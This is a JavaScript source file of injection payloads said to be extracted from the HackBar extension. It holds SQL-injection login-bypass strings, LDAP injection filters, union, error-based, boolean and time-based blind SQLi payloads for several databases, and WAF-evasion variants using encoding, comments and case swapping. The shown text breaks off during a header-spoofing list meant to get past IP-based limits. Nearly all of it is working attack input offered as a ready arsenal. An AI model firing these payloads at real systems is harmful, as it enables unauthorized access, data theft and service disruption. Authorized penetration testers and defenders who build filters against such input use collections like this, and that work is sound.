// Auth-bypass & LDAP payloads extracted from ph.hitachi HackBar v2.9
export const ADMIN = [
  { name: "' or ''='", payload: "' or ''='" },
  { name: "' or 1='1", payload: "' or 1='1" },
  { name: "' or '1'='1", payload: "' or '1'='1" },
  { name: "' or ' 1=1", payload: "' or ' 1=1" },
  { name: "' or 1=1--", payload: "' or 1=1--" },
  { name: "' or 1=1#", payload: "' or 1=1#" },
  { name: "' or 1=1/*", payload: "' or 1=1/*" },
  { name: "') or '1'='1--", payload: "') or '1'='1--" },
  { name: "') or ('1'='1--", payload: "') or ('1'='1--" },
  { name: "' or 1=1)#", payload: "' or 1=1)#" },
  { name: "' or '1?='1", payload: "' or '1?='1" },
  { name: "' or 'x'='x", payload: "' or 'x'='x" },
  { name: "' or 0=0 –", payload: "' or 0=0 –" },
  { name: "or 0=0 –", payload: "or 0=0 –" },
  { name: "' or 0=0 #", payload: "' or 0=0 #" },
  { name: "or 0=0 #", payload: "or 0=0 #" },
  { name: "' or 'x'='x", payload: "' or 'x'='x" },
  { name: "') or ('x'='x", payload: "') or ('x'='x" },
  { name: "' or 1=1–", payload: "' or 1=1–" },
  { name: "'' or a=a–", payload: "'' or a=a–" },
  { name: "') or ('a'='a", payload: "') or ('a'='a" },
  { name: "hi' or 1=1 –", payload: "hi' or 1=1 –" },
  { name: "'or'1=1?", payload: "'or'1=1?" },
  { name: "'-'", payload: "'-'" },
  { name: "' '", payload: "' '" },
  { name: "'&'", payload: "'&'" },
  { name: "'^'", payload: "'^'" },
  { name: "'*'", payload: "'*'" },
  { name: "' or ''-'", payload: "' or ''-'" },
  { name: "' or '' '", payload: "' or '' '" },
  { name: "' or ''&'", payload: "' or ''&'" },
  { name: "' or ''^'", payload: "' or ''^'" },
  { name: "' or ''*'", payload: "' or ''*'" },
  { name: "or true--", payload: "or true--" },
  { name: "' or true--", payload: "' or true--" },
  { name: "') or ('x')=('x", payload: "') or ('x')=('x" },
  { name: "')) or (('x'))=(('x", payload: "')) or (('x'))=(('x" },
  { name: "admin' --", payload: "admin' --" },
  { name: "admin' #", payload: "admin' #" },
  { name: "admin'/*", payload: "admin'/*" },
  { name: "admin' or '1'='1", payload: "admin' or '1'='1" },
  { name: "admin' or '1'='1'--", payload: "admin' or '1'='1'--" },
  { name: "admin' or '1'='1'#", payload: "admin' or '1'='1'#" },
  { name: "admin' or '1'='1'/*", payload: "admin' or '1'='1'/*" },
  { name: "admin'or 1=1 or ''='", payload: "admin'or 1=1 or ''='" },
  { name: "admin') or ('1'='1", payload: "admin') or ('1'='1" },
  { name: "admin') or ('1'='1'/*", payload: "admin') or ('1'='1'/*" },
  { name: "'or'1=1'", payload: "'or'1=1'" },
  { name: "' or 'a'='a", payload: "' or 'a'='a" },
  { name: "'OR 1=1 LIMIT 1 ;#", payload: "'OR 1=1 LIMIT 1 ;#" },
  { name: "'or 1=1 limit 1 -- -+", payload: "'or 1=1 limit 1 -- -+" },
  { name: "admin'--", payload: "admin'--" },
  { name: "x'or'x'='x", payload: "x'or'x'='x" },
  { name: "'or 0=0 --", payload: "'or 0=0 --" },
  { name: "\"or 0=0 --", payload: "\"or 0=0 --" },
  { name: "or 0=0 --", payload: "or 0=0 --" },
  { name: "'or 0=0 #", payload: "'or 0=0 #" },
  { name: "\" or 0=0 #", payload: "\" or 0=0 #" },
  { name: "or 0=0 #", payload: "or 0=0 #" },
  { name: "' or 'x'='x", payload: "' or 'x'='x" },
  { name: "\" or \"x\"=\"x", payload: "\" or \"x\"=\"x" },
  { name: "') or ('x'='x", payload: "') or ('x'='x" },
  { name: "' or 1=1--", payload: "' or 1=1--" },
  { name: "\" or 1=1--", payload: "\" or 1=1--" },
  { name: "or 1=1--", payload: "or 1=1--" },
  { name: "' or a=a--", payload: "' or a=a--" },
  { name: "\" or \"a\"=\"a", payload: "\" or \"a\"=\"a" },
  { name: "') or ('a'='a", payload: "') or ('a'='a" },
  { name: "\") or (\"a\"=\"a ", payload: "\") or (\"a\"=\"a " },
  { name: "hi\" or \"a\"=\"a", payload: "hi\" or \"a\"=\"a" },
  { name: "hi\" or 1=1 --", payload: "hi\" or 1=1 --" },
  { name: "hi' or 1=1 --", payload: "hi' or 1=1 --" },
  { name: "hi' or 'a'='a", payload: "hi' or 'a'='a" },
  { name: "hi') or ('a'='a", payload: "hi') or ('a'='a" },
  { name: "hi\") or (\"a\"=\"a", payload: "hi\") or (\"a\"=\"a" },
  { name: "or '1'='1", payload: "or '1'='1" },
  { name: "' or 'x'='x", payload: "' or 'x'='x" },
  { name: "' or 0=0 -- ", payload: "' or 0=0 -- " },
  { name: "\" or 0=0 --", payload: "\" or 0=0 --" },
  { name: "or 0=0 --", payload: "or 0=0 --" },
  { name: "' or 0=0 #", payload: "' or 0=0 #" },
  { name: "\" or 0=0 #", payload: "\" or 0=0 #" },
  { name: "or 0=0 #", payload: "or 0=0 #" },
  { name: "' or 'x'='x", payload: "' or 'x'='x" },
  { name: "\" or \"x\"=\"x", payload: "\" or \"x\"=\"x" },
  { name: "') or ('x'='x", payload: "') or ('x'='x" },
  { name: "' or 1=1--", payload: "' or 1=1--" },
  { name: "\" or 1=1--", payload: "\" or 1=1--" },
  { name: "or 1=1--", payload: "or 1=1--" },
  { name: "' or a=a--", payload: "' or a=a--" },
  { name: "\" or \"a\"=\"a", payload: "\" or \"a\"=\"a" },
  { name: "') or ('a'='a", payload: "') or ('a'='a" },
  { name: "\") or (\"a\"=\"a", payload: "\") or (\"a\"=\"a" },
  { name: "hi\" or \"a\"=\"a", payload: "hi\" or \"a\"=\"a" },
  { name: "hi\" or 1=1 --", payload: "hi\" or 1=1 --" },
  { name: "hi' or 1=1 --", payload: "hi' or 1=1 --" },
  { name: "'or'1=1'", payload: "'or'1=1'" },
  { name: "==", payload: "==" },
  { name: "and 1=1--", payload: "and 1=1--" },
  { name: "and 1=1", payload: "and 1=1" },
  { name: "' or 'one'='one--", payload: "' or 'one'='one--" },
  { name: "' or 'one'='one", payload: "' or 'one'='one" },
  { name: "' and 'one'='one", payload: "' and 'one'='one" },
  { name: "' and 'one'='one--", payload: "' and 'one'='one--" },
  { name: "1') and '1'='1--", payload: "1') and '1'='1--" },
  { name: "admin' --", payload: "admin' --" },
  { name: "admin' #", payload: "admin' #" },
  { name: "admin'/*", payload: "admin'/*" },
  { name: "or 1=1--", payload: "or 1=1--" },
  { name: "or 1=1#", payload: "or 1=1#" },
  { name: "or 1=1/*", payload: "or 1=1/*" },
  { name: ") or '1'='1--", payload: ") or '1'='1--" },
  { name: ") or ('1'='1--", payload: ") or ('1'='1--" },
  { name: "' or '1'='1", payload: "' or '1'='1" },
  { name: "' or 'x'='x", payload: "' or 'x'='x" },
  { name: "' or 0=0 --", payload: "' or 0=0 --" },
  { name: "\" or 0=0 -- ", payload: "\" or 0=0 -- " },
  { name: "or 0=0 --", payload: "or 0=0 --" },
  { name: "' or 0=0 #", payload: "' or 0=0 #" },
  { name: "\" or 0=0 #", payload: "\" or 0=0 #" },
  { name: "or 0=0 # '", payload: "or 0=0 # '" },
  { name: "or 'x'='x  ", payload: "or 'x'='x  " },
  { name: "or \"x\"=\"x", payload: "or \"x\"=\"x" },
  { name: "') or ('x'='x", payload: "') or ('x'='x" },
  { name: "' or 1=1--", payload: "' or 1=1--" },
  { name: "\" or 1=1--", payload: "\" or 1=1--" },
  { name: "or 1=1-- '", payload: "or 1=1-- '" },
  { name: "or a=a-- \"", payload: "or a=a-- \"" },
  { name: "or (\"a\"=\"a hi\"", payload: "or (\"a\"=\"a hi\"" },
  { name: "or \"a\"=\"a hi\"", payload: "or \"a\"=\"a hi\"" },
  { name: "or 1=1 --", payload: "or 1=1 --" },
  { name: "hi' or 1=1 --", payload: "hi' or 1=1 --" },
  { name: "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", payload: "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055" },
];

export const LDAP = [
  { name: "*", payload: "*" },
  { name: "*)(&", payload: "*)(&" },
  { name: "*))%26'", payload: "*))%26'" },
  { name: "*()|&'", payload: "*()|&'" },
  { name: "*(|(mail=*))", payload: "*(|(mail=*))" },
  { name: "*(|(objectclass=*))", payload: "*(|(objectclass=*))" },
  { name: "*)(uid=*))(|(uid=*", payload: "*)(uid=*))(|(uid=*" },
  { name: "*/*", payload: "*/*" },
  { name: "*|", payload: "*|" },
  { name: "//*", payload: "//*" },
  { name: "@*", payload: "@*" },
  { name: "admin*", payload: "admin*" },
  { name: "admin*)((|userpassword=*)", payload: "admin*)((|userpassword=*)" },
  { name: "x' or name()='username' or 'x'='y", payload: "x' or name()='username' or 'x'='y" },
  { name: "%2A%28%7C%28mail%3D%2A%29%29", payload: "%2A%28%7C%28mail%3D%2A%29%29" },
  { name: "*(|(mail=*))", payload: "*(|(mail=*))" },
  { name: "*(|(objectclass=*))", payload: "*(|(objectclass=*))" },
  { name: "x' or name()='username' or 'x'='y", payload: "x' or name()='username' or 'x'='y" },
  { name: "admin*)((|userpassword=*)", payload: "admin*)((|userpassword=*)" },
  { name: "*)(uid=*))(|(uid=*", payload: "*)(uid=*))(|(uid=*" },
  { name: "%2A%28%7C%28objectclass%3D%2A%29%29", payload: "%2A%28%7C%28objectclass%3D%2A%29%29" },
  { name: "%2A%7C", payload: "%2A%7C" },
  { name: "%7C", payload: "%7C" },
];

// ─── SQL INJECTION PAYLOADS ────────────────────────────────────────────────

// General SQLi (error-based, union-based, etc.)
export const SQL_GENERAL = [
  { name: "Union select NULL", payload: "' UNION SELECT NULL--" },
  { name: "Union select NULL,NULL", payload: "' UNION SELECT NULL,NULL--" },
  { name: "Union select 1,2,3", payload: "' UNION SELECT 1,2,3--" },
  { name: "Union all select NULL", payload: "' UNION ALL SELECT NULL--" },
  { name: "Union all select 1,2,3", payload: "' UNION ALL SELECT 1,2,3--" },
  { name: "Union select version()", payload: "' UNION SELECT @@version--" },
  { name: "Union select user()", payload: "' UNION SELECT user()--" },
  { name: "Union select database()", payload: "' UNION SELECT database()--" },
  { name: "Error-based MySQL (extractvalue)", payload: "' AND extractvalue(1,concat(0x7e,database()))--" },
  { name: "Error-based MySQL (updatexml)", payload: "' AND updatexml(1,concat(0x7e,database()),1)--" },
  { name: "Error-based MySQL (geometrycollection)", payload: "' AND geometrycollection((select * from (select * from(select user())a)b))--" },
  { name: "Error-based MySQL (multipoint)", payload: "' AND multipoint((select * from (select * from(select user())a)b))--" },
  { name: "Error-based MSSQL (convert int)", payload: "' AND 1=convert(int,@@version)--" },
  { name: "Error-based MSSQL (cast)", payload: "' AND 1=cast((select @@version) as int)--" },
  { name: "Error-based MSSQL (sysobjects)", payload: "' AND 1=(select top 1 name from sysobjects)--" },
  { name: "Error-based Oracle (xmlgen)", payload: "' AND 1=dbms_xmlgen.getxml('select user from dual')--" },
  { name: "Error-based Oracle (drithsx)", payload: "' AND 1=ctxsys.drithsx.sn(1,(select user from dual))--" },
  { name: "Error-based PostgreSQL (cast)", payload: "' AND 1=cast((select version()) as int)--" },
  { name: "Error-based SQLite (cast)", payload: "' AND 1=cast(sqlite_version() as int)--" },
  { name: "Stacked query (MySQL)", payload: "'; SELECT SLEEP(5)--" },
  { name: "Stacked query (MSSQL)", payload: "'; WAITFOR DELAY '0:0:5'--" },
  { name: "Stacked query (PostgreSQL)", payload: "'; SELECT pg_sleep(5)--" },
  { name: "Stacked query (Oracle)", payload: "'; BEGIN DBMS_LOCK.SLEEP(5); END;--" },
  { name: "Stacked query (SQLite)", payload: "'; SELECT randomblob(50000000)--" },
  { name: "Comment bypass (--)", payload: "' OR 1=1--" },
  { name: "Comment bypass (#)", payload: "' OR 1=1#" },
  { name: "Comment bypass (/* */)", payload: "' OR 1=1/*" },
  { name: "Comment bypass (;%00)", payload: "' OR 1=1;%00" },
  { name: "Inline comment (MySQL)", payload: "' OR 1=1/*!*/" },
  { name: "Double quote variant", payload: "\" OR 1=1--" },
  { name: "Numeric injection", payload: "1 OR 1=1--" },
  { name: "Numeric with AND", payload: "1 AND 1=1--" },
  { name: "Numeric with OR", payload: "1 OR 1=1--" },
  { name: "Parenthesis injection", payload: "') OR ('1'='1--" },
  { name: "Double parenthesis", payload: "')) OR (('1'='1--" },
  { name: "Concat bypass (MySQL)", payload: "' OR '1'='1' AND '1'='1" },
  { name: "Concat bypass (MSSQL)", payload: "' OR '1'='1' AND '1'='1" },
  { name: "Case variation", payload: "' oR 1=1--" },
  { name: "URL encoded (single quote)", payload: "%27%20OR%201%3D1--" },
  { name: "URL encoded (double quote)", payload: "%22%20OR%201%3D1--" },
];

// Blind SQL Injection (Boolean-based and Time-based)
export const SQL_BLIND = [
  // ── Boolean-based ──
  { name: "Boolean: AND 1=1", payload: "' AND 1=1--" },
  { name: "Boolean: AND 1=2", payload: "' AND 1=2--" },
  { name: "Boolean: AND '1'='1", payload: "' AND '1'='1--" },
  { name: "Boolean: AND '1'='2", payload: "' AND '1'='2--" },
  { name: "Boolean: OR 1=1", payload: "' OR 1=1--" },
  { name: "Boolean: OR 1=2", payload: "' OR 1=2--" },
  { name: "Boolean: OR 'a'='a", payload: "' OR 'a'='a--" },
  { name: "Boolean: OR 'a'='b", payload: "' OR 'a'='b--" },
  { name: "Boolean: AND 1=1 (double quote)", payload: "\" AND 1=1--" },
  { name: "Boolean: AND 1=2 (double quote)", payload: "\" AND 1=2--" },
  { name: "Boolean: OR 1=1 (double quote)", payload: "\" OR 1=1--" },
  { name: "Boolean: OR 1=2 (double quote)", payload: "\" OR 1=2--" },
  { name: "Boolean: AND 1=1 with parens", payload: "') AND 1=1--" },
  { name: "Boolean: AND 1=2 with parens", payload: "') AND 1=2--" },
  { name: "Boolean: OR 1=1 with parens", payload: "') OR 1=1--" },
  { name: "Boolean: OR 1=2 with parens", payload: "') OR 1=2--" },
  { name: "Boolean: AND 1=1 (numeric)", payload: "1 AND 1=1--" },
  { name: "Boolean: AND 1=2 (numeric)", payload: "1 AND 1=2--" },
  { name: "Boolean: OR 1=1 (numeric)", payload: "1 OR 1=1--" },
  { name: "Boolean: OR 1=2 (numeric)", payload: "1 OR 1=2--" },
  { name: "Boolean: AND '1'='1 (MSSQL)", payload: "' AND '1'='1--" },
  { name: "Boolean: AND '1'='2 (MSSQL)", payload: "' AND '1'='2--" },
  { name: "Boolean: OR '1'='1 (MSSQL)", payload: "' OR '1'='1--" },
  { name: "Boolean: OR '1'='2 (MSSQL)", payload: "' OR '1'='2--" },
  { name: "Boolean: AND 1=1 with hash", payload: "' AND 1=1#" },
  { name: "Boolean: AND 1=2 with hash", payload: "' AND 1=2#" },
  { name: "Boolean: OR 1=1 with hash", payload: "' OR 1=1#" },
  { name: "Boolean: OR 1=2 with hash", payload: "' OR 1=2#" },
  { name: "Boolean: AND 1=1 with /*", payload: "' AND 1=1/*" },
  { name: "Boolean: AND 1=2 with /*", payload: "' AND 1=2/*" },
  { name: "Boolean: OR 1=1 with /*", payload: "' OR 1=1/*" },
  { name: "Boolean: OR 1=2 with /*", payload: "' OR 1=2/*" },
  // ── Time-based ──
  { name: "Time: SLEEP(5) (MySQL)", payload: "' AND SLEEP(5)--" },
  { name: "Time: SLEEP(5) with OR", payload: "' OR SLEEP(5)--" },
  { name: "Time: SLEEP(5) with AND (double quote)", payload: "\" AND SLEEP(5)--" },
  { name: "Time: SLEEP(5) with parens", payload: "') AND SLEEP(5)--" },
  { name: "Time: BENCHMARK(1000000,MD5('a'))", payload: "' AND BENCHMARK(1000000,MD5('a'))--" },
  { name: "Time: BENCHMARK with OR", payload: "' OR BENCHMARK(1000000,MD5('a'))--" },
  { name: "Time: WAITFOR DELAY (MSSQL)", payload: "' WAITFOR DELAY '0:0:5'--" },
  { name: "Time: WAITFOR DELAY with OR", payload: "' OR WAITFOR DELAY '0:0:5'--" },
  { name: "Time: pg_sleep(5) (PostgreSQL)", payload: "' AND pg_sleep(5)--" },
  { name: "Time: pg_sleep(5) with OR", payload: "' OR pg_sleep(5)--" },
  { name: "Time: DBMS_LOCK.SLEEP (Oracle)", payload: "' AND DBMS_LOCK.SLEEP(5)--" },
  { name: "Time: DBMS_LOCK.SLEEP with OR", payload: "' OR DBMS_LOCK.SLEEP(5)--" },
  { name: "Time: randomblob (SQLite)", payload: "' AND randomblob(50000000)--" },
  { name: "Time: SLEEP in subquery (MySQL)", payload: "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--" },
  { name: "Time: SLEEP in CASE (MySQL)", payload: "' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--" },
  { name: "Time: WAITFOR with stacked query (MSSQL)", payload: "'; WAITFOR DELAY '0:0:5'--" },
  { name: "Time: pg_sleep with stacked (PostgreSQL)", payload: "'; SELECT pg_sleep(5)--" },
  { name: "Time: DBMS_LOCK.SLEEP with stacked (Oracle)", payload: "'; BEGIN DBMS_LOCK.SLEEP(5); END;--" },
  { name: "Time: SLEEP with numeric", payload: "1 AND SLEEP(5)--" },
  { name: "Time: SLEEP with numeric OR", payload: "1 OR SLEEP(5)--" },
  { name: "Time: SLEEP with comment #", payload: "' AND SLEEP(5)#" },
  { name: "Time: SLEEP with comment /*", payload: "' AND SLEEP(5)/*" },
  // ── Advanced blind ──
  { name: "Boolean: substring extraction (MySQL)", payload: "' AND substring(database(),1,1)='a'--" },
  { name: "Boolean: ASCII extraction (MySQL)", payload: "' AND ascii(substring(database(),1,1))>97--" },
  { name: "Boolean: substring extraction (MSSQL)", payload: "' AND substring((select db_name()),1,1)='a'--" },
  { name: "Boolean: ASCII extraction (MSSQL)", payload: "' AND ascii(substring((select db_name()),1,1))>97--" },
  { name: "Boolean: substring extraction (PostgreSQL)", payload: "' AND substring((select current_database()),1,1)='a'--" },
  { name: "Boolean: ASCII extraction (PostgreSQL)", payload: "' AND ascii(substring((select current_database()),1,1))>97--" },
  { name: "Time: conditional SLEEP (MySQL)", payload: "' AND IF(1=1,SLEEP(5),0)--" },
  { name: "Time: conditional WAITFOR (MSSQL)", payload: "' AND IF(1=1) WAITFOR DELAY '0:0:5'--" },
  { name: "Time: conditional pg_sleep (PostgreSQL)", payload: "' AND CASE WHEN 1=1 THEN pg_sleep(5) ELSE 0 END--" },
  { name: "Time: conditional DBMS_LOCK.SLEEP (Oracle)", payload: "' AND CASE WHEN 1=1 THEN DBMS_LOCK.SLEEP(5) ELSE 0 END--" },
];

// ─── ADVANCED WAF BYPASS – TIME BASED ──────────────────────────────────────
export const SQL_WAF_BYPASS = [
  // ── Whitespace & comment obfuscation ──
  { name: "WAF: SLEEP with /**/", payload: "' AND SLEEP/**/(5)--" },
  { name: "WAF: SLEEP with /*!*/", payload: "' AND SLEEP(5)/*!*/--" },
  { name: "WAF: SLEEP with # (url encoded)", payload: "' AND SLEEP(5)%23" },
  { name: "WAF: SLEEP with -- (url encoded)", payload: "' AND SLEEP(5)%2D%2D" },
  { name: "WAF: SLEEP with newline (0x0a)", payload: "' AND SLEEP(5)%0a--" },
  { name: "WAF: SLEEP with tab (0x09)", payload: "' AND SLEEP(5)%09--" },
  { name: "WAF: SLEEP with multiple whitespace", payload: "' AND SLEEP(  5  )--" },
  { name: "WAF: SLEEP with versioned comment (MySQL)", payload: "' AND SLEEP/*!50000*/(5)--" },
  { name: "WAF: SLEEP with parenthesis after function", payload: "' AND SLEEP (5)--" },
  { name: "WAF: SLEEP with case swapping", payload: "' AND SlEeP(5)--" },
  // ── Using alternatives ──
  { name: "WAF: BENCHMARK with comments", payload: "' AND BENCHMARK(10000000,MD5('a'))/*!*/--" },
  { name: "WAF: BENCHMARK with case swap", payload: "' AND BeNcHmArK(10000000,Md5('a'))--" },
  { name: "WAF: GET_LOCK (MySQL)", payload: "' AND GET_LOCK('a',5)--" },
  { name: "WAF: RLIKE with heavy subquery", payload: "' AND RLIKE('a',(SELECT BENCHMARK(10000000,MD5('a'))))--" },
  // ── Conditional time delays ──
  { name: "WAF: IF with SLEEP", payload: "' AND IF(1=1,SLEEP(5),0)--" },
  { name: "WAF: IF with SLEEP and comments", payload: "' AND IF(1=1,SLEEP/**/(5),0)--" },
  { name: "WAF: CASE with SLEEP", payload: "' AND CASE WHEN 1=1 THEN SLEEP(5) ELSE 0 END--" },
  { name: "WAF: CASE with SLEEP and newline", payload: "' AND CASE%0aWHEN 1=1%0aTHEN SLEEP(5)%0aELSE 0%0aEND--" },
  { name: "WAF: IF with BENCHMARK", payload: "' AND IF(1=1,BENCHMARK(10000000,MD5('a')),0)--" },
  // ── String concatenation / obfuscation ──
  { name: "WAF: SLEEP with concat", payload: "' AND SLEEP(concat(5))--" },
  { name: "WAF: SLEEP with hex literal", payload: "' AND SLEEP(0x35)--" },
  // ── MSSQL WAF bypass ──
  { name: "WAF: WAITFOR DELAY with comments", payload: "' WAITFOR/**/DELAY '0:0:5'--" },
  { name: "WAF: WAITFOR DELAY with newline", payload: "' WAITFOR%0aDELAY '0:0:5'--" },
  { name: "WAF: WAITFOR DELAY with case swap", payload: "' wAiTfOr DeLaY '0:0:5'--" },
  { name: "WAF: WAITFOR DELAY with double quote", payload: "\" WAITFOR DELAY '0:0:5'--" },
  { name: "WAF: WAITFOR DELAY with AND", payload: "' AND 1=1 WAITFOR DELAY '0:0:5'--" },
  // ── PostgreSQL WAF bypass ──
  { name: "WAF: pg_sleep with comments", payload: "' AND pg_sleep/**/(5)--" },
  { name: "WAF: pg_sleep with case swap", payload: "' AND Pg_SlEeP(5)--" },
  { name: "WAF: pg_sleep with newline", payload: "' AND pg_sleep(5)%0a--" },
  // ── Oracle WAF bypass ──
  { name: "WAF: DBMS_LOCK.SLEEP with comments", payload: "' AND DBMS_LOCK.SLEEP/**/(5)--" },
  { name: "WAF: DBMS_LOCK.SLEEP with case swap", payload: "' AND DbMs_LoCk.SlEeP(5)--" },
  // ── Combined with OR / AND to bypass blacklisting ──
  { name: "WAF: OR SLEEP with case variation", payload: "' OR SlEeP(5)--" },
  { name: "WAF: AND SLEEP with double quote and comment", payload: "\" AND SLEEP/**/(5)--" },
  { name: "WAF: OR SLEEP with hash and newline", payload: "' OR SLEEP(5)%23%0a" },
  // ── Using arithmetic to cause delay (heavy computation) ──
  { name: "WAF: Heavy computation (MySQL)", payload: "' AND (SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_SCHEMA=database() AND SLEEP(5))--" },
  { name: "WAF: Heavy subquery with SLEEP", payload: "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)/*!*/--" },
  // ── Double encoding ──
  { name: "WAF: Double URL encode SLEEP", payload: "'%2520AND%2520SLEEP(5)--" },

  // ──────────── YOUR DISCOVERED PAYLOADS (integrated) ─────────────────────

  // PostgreSQL: concat with subquery
  { name: "WAF: PostgreSQL concat with pg_sleep", payload: "''||(select 1 from (select pg_sleep(6))x)||'" },
  // MySQL: XOR with IF and now()=sysdate()
  { name: "WAF: MySQL XOR with IF (now=sysdate)", payload: "'XOR(if(now()=sysdate(),sleep(5),0))XOR'" },
  // MySQL: stacked query with IF and SLEEP (as seen in URL)
  { name: "WAF: MySQL stacked IF SLEEP (numeric)", payload: "1;SELECT IF((8303>8302),SLEEP(9),2356)#" },
  { name: "WAF: MySQL stacked IF SLEEP (bracketed)", payload: "[1;SELECT IF((8303>8302),SLEEP(9),2356)#]" },
  // MySQL: subquery with sleep
  { name: "WAF: MySQL subquery sleep", payload: "(select*from(select(sleep(15)))a)" },
  // MySQL: XOR with single quote and IF
  { name: "WAF: MySQL XOR with IF (single quote)", payload: "-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z" },
  // Oracle: DBMS_PIPE.RECEIVE_MESSAGE with CHR concatenation
  { name: "WAF: Oracle DBMS_PIPE.RECEIVE_MESSAGE", payload: "orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'" },
  // MySQL: URL encoded AND with SLEEP
  { name: "WAF: MySQL URL encoded AND SLEEP", payload: "14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515" },
  // MSSQL: URL encoded WAITFOR DELAY
  { name: "WAF: MSSQL URL encoded WAITFOR DELAY", payload: ">'%3bWAITFOR+DELAY+'00%3a00%3a5'--" },
  // MySQL: XOR with OR and IF
  { name: "WAF: MySQL XOR with OR and IF", payload: "'XOR(if(now()=sysdate(),sleep(33),0))OR'" },
  // MySQL: XOR with double quote and IF
  { name: "WAF: MySQL XOR with double quote and IF", payload: "\"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z\"" },
  // MySQL: URL encoded AND with SLEEP and comment
  { name: "WAF: MySQL URL encoded AND SLEEP with comment", payload: ",%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW" },

  // ──────────── ADDITIONAL SIMILAR PAYLOADS ──────────────────────────────

  // More PostgreSQL variants
  { name: "WAF: PostgreSQL AND pg_sleep with concat", payload: "' AND (SELECT 1 FROM (SELECT pg_sleep(5))x)--" },
  { name: "WAF: PostgreSQL OR pg_sleep with comments", payload: "' OR pg_sleep/**/(5)--" },
  // More MySQL XOR variants
  { name: "WAF: MySQL XOR with SLEEP (no IF)", payload: "'XOR(sleep(5))XOR'" },
  { name: "WAF: MySQL XOR with BENCHMARK", payload: "'XOR(benchmark(5000000,md5('a')))XOR'" },
  // More Oracle variants
  { name: "WAF: Oracle DBMS_LOCK.SLEEP with concat", payload: "' AND DBMS_LOCK.SLEEP(5)||'1'='1" },
  { name: "WAF: Oracle DBMS_PIPE.RECEIVE_MESSAGE with hex", payload: "' OR DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)='a" },
  // More MSSQL variants
  { name: "WAF: MSSQL WAITFOR DELAY with conditional", payload: "' AND (SELECT CASE WHEN 1=1 THEN WAITFOR DELAY '0:0:5' ELSE 0 END)--" },
  { name: "WAF: MSSQL WAITFOR DELAY with heavy subquery", payload: "' AND (SELECT COUNT(*) FROM sysobjects WHERE 1=1 AND WAITFOR DELAY '0:0:5')--" },
  // More URL encoded / double encoded
  { name: "WAF: Double URL encoded SLEEP (MySQL)", payload: "'%25252520AND%25252520SLEEP(5)" },
  { name: "WAF: URL encoded AND with SLEEP and comment", payload: "%27%20AND%20SLEEP%285%29%23" },
  // Using different functions
  { name: "WAF: MySQL RAND() with heavy computation", payload: "' AND RAND()=(SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_SCHEMA=database() AND SLEEP(5))--" },
  { name: "WAF: MySQL SLEEP in CASE with concat", payload: "' AND CASE WHEN 1=1 THEN SLEEP(concat(5)) ELSE 0 END--" },
  // Using non-standard quotes
  { name: "WAF: MySQL SLEEP with backtick", payload: "` AND SLEEP(5)--" },
  // Using comments inside function name
  { name: "WAF: MySQL SLEEP with comments inside", payload: "' AND SLE/*!*/EP(5)--" },
  // Using encoded characters
  { name: "WAF: MySQL SLEEP with char()", payload: "' AND SLEEP(char(53))--" },
  // Using multiple statements (stacked)
  { name: "WAF: MySQL stacked SLEEP with semicolon", payload: "';SELECT SLEEP(5);--" },
  { name: "WAF: MSSQL stacked WAITFOR", payload: "';WAITFOR DELAY '0:0:5';--" },
  // Using heavy Cartesian joins
  { name: "WAF: MySQL heavy Cartesian join (time)", payload: "' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C WHERE A.TABLE_SCHEMA=database() AND SLEEP(0))--" },
];

// ─── HEADERS FOR BYPASS (expanded to 200+ entries) ────────────────────────

export const BYPASS_HEADERS = [
  // ────────── IP SPOOFING (rate‑limit, geo, WAF) ───────────
  { name: "X-Forwarded-For: 127.0.0.1", payload: "X-Forwarded-For: 127.0.0.1" },
  { name: "X-Forwarded-For: 192.168.1.1", payload: "X-Forwarded-For: 192.168.1.1" },
  { name: "X-Forwarded-For: 10.0.0.1", payload: "X-Forwarded-For: 10.0.0.1" },
  { name: "X-Forwarded-For: 0.0.0.0", payload: "X-Forwarded-For: 0.0.0.0" },
  { name: "X-Forwarded-For: ::1", payload: "X-Forwarded-For: ::1" },
  { name: "X-Forwarded-For: 127.0.0.1, 192.168.1.1", payload: "X-Forwarded-For: 127.0.0.1, 192.168.1.1" },
  { name: "X-Forwarded-For: 10.0.0.2", payload: "X-Forwarded-For: 10.0.0.2" },
  { name: "X-Forwarded-For: 10.0.0.3", payload: "X-Forwarded-For: 10.0.0.3" },
  { name: "X-Real-IP: 127.0.0.1", payload: "X-Real-IP: 127.0.0.1" },
  { name: "X-Real-IP: 192.168.1.1", payload: "X-Real-IP: 192.168.1.1" },
  { name: "X-Originating-IP: 127.0.0.1", payload: "X-Originating-IP: 127.0.0.1" },
  { name: "X-Remote-IP: 127.0.0.1", payload: "X-Remote-IP: 127.0.0.1" },
  { name: "X-Remote-Addr: 127.0.0.1", payload: "X-Remote-Addr: 127.0.0.1" },
  { name: "X-Client-IP: 127.0.0.1", payload: "X-Client-IP: 127.0.0.1" },
  { name: "X-Host: 127.0.0.1", payload: "X-Host: 127.0.0.1" },
  { name: "X-Forwarded-Host: 127.0.0.1", payload: "X-Forwarded-Host: 127.0.0.1" },
  { name: "Forwarded: for=127.0.0.1", payload: "Forwarded: for=127.0.0.1" },
  { name: "Client-IP: 127.0.0.1", payload: "Client-IP: 127.0.0.1" },
  { name: "True-Client-IP: 127.0.0.1", payload: "True-Client-IP: 127.0.0.1" },
  { name: "X-Proxy-IP: 127.0.0.1", payload: "X-Proxy-IP: 127.0.0.1" },
  { name: "X-Cluster-Client-IP: 127.0.0.1", payload: "X-Cluster-Client-IP: 127.0.0.1" },
  { name: "X-Original-Forwarded-For: 127.0.0.1", payload: "X-Original-Forwarded-For: 127.0.0.1" },
